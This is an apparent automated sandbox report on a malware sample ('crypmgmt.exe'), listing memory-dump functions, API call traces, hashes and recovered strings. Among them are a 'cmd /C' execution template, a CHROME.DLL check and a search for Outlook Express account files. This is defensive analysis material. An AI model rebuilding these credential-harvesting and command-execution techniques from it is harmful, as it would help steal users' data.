Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68250

General

Root Process Name:d3d8sext.exe
Process MD5:28093D270494BF7FD72450B008A4D71A
Total matches:161
Initial Analysis Report:Open
Initial sample Analysis ID:68250
Initial sample SHA 256:522FC57F7A4F79ACDD2A84AD6941117A33B3B464DEB30E5F5826F9049E04472E
